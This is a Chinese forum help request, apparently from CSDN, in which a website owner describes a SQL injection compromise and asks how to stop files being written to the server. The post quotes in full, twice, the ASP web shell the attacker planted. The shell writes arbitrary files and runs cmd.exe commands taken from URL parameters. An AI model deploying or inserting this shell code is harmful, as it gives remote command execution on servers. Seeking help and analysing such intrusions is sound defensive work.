注入了四个表
d99_cmd,d99_reg,d99_tmp,pangolin_test_table
在网站的根目录里注入了四个文件
98.asp,315.asp,db.asp,le.asp
在我的C盘里注入了一个cpand99.txt文件
它的内容是:
<%Dim objFSO%>
<%Dim fdata%>
<%Dim objCountFile%>
<%on error resume next%>
<%Set objFSO = Server.CreateObject("Scripting.FileSystemObject")%>
<%if Trim(request("syfdpath"))<>"" then%>
<%fdata = request("cyfddata")%>
<%Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True)%>
<%objCountFile.Write fdata%>
<%else%>
<%end if%>
<%err.clear%>
<%end if%>
<%Set objFSO = Nothing%>
<%=server.createobject("wscript.shell").exec("cmd.exe /c" &request("c")).stdout.readall%> 我看了一下日志.是通过url用sql注入的.我想问一下我能不能通过重写一个url把这个解决掉.
还是就是能不能有别的办法不要再让它向里面写文件了.我网站已经把everyone 用户删除了.其它的用户也只有read的权限.可还是注入了.请高手救命呀!
d99_cmd,d99_reg,d99_tmp,pangolin_test_table
在网站的根目录里注入了四个文件
98.asp,315.asp,db.asp,le.asp
在我的C盘里注入了一个cpand99.txt文件
它的内容是:
<%Dim objFSO%>
<%Dim fdata%>
<%Dim objCountFile%>
<%on error resume next%>
<%Set objFSO = Server.CreateObject("Scripting.FileSystemObject")%>
<%if Trim(request("syfdpath"))<>"" then%>
<%fdata = request("cyfddata")%>
<%Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True)%>
<%objCountFile.Write fdata%>
<%else%>
<%end if%>
<%err.clear%>
<%end if%>
<%Set objFSO = Nothing%>
<%=server.createobject("wscript.shell").exec("cmd.exe /c" &request("c")).stdout.readall%> 我看了一下日志.是通过url用sql注入的.我想问一下我能不能通过重写一个url把这个解决掉.
还是就是能不能有别的办法不要再让它向里面写文件了.我网站已经把everyone 用户删除了.其它的用户也只有read的权限.可还是注入了.请高手救命呀!
解决方案 »
- .net网站发布到互联网上 session 丢失 IIS没有问题
- 多表修改 我不懂
- 关于word操作的问题
- format() 如何格式化字符窜的长度
- |...|Flash编程,很难,怎么拖动MovieClip的同时拖动上面所有原件(比如Button)
- 关于asp.net提交数据问题!!!!!
- 如何用VMoom.Framework实现二级域名
- file field设了id及name还有runat=server,form设定了multipart/form就是不能引用id
- 急啊急!!!!!!关于RDLC查询并打印~
- 上传文件时遇到的问题,请指教
- asp.net如何取出刚保存的数据?
- GridView疑问,真是要命??
http://topic.csdn.net/u/20090708/09/b78444ee-9081-4ff7-8aa5-ba6f9b1d9fdc.html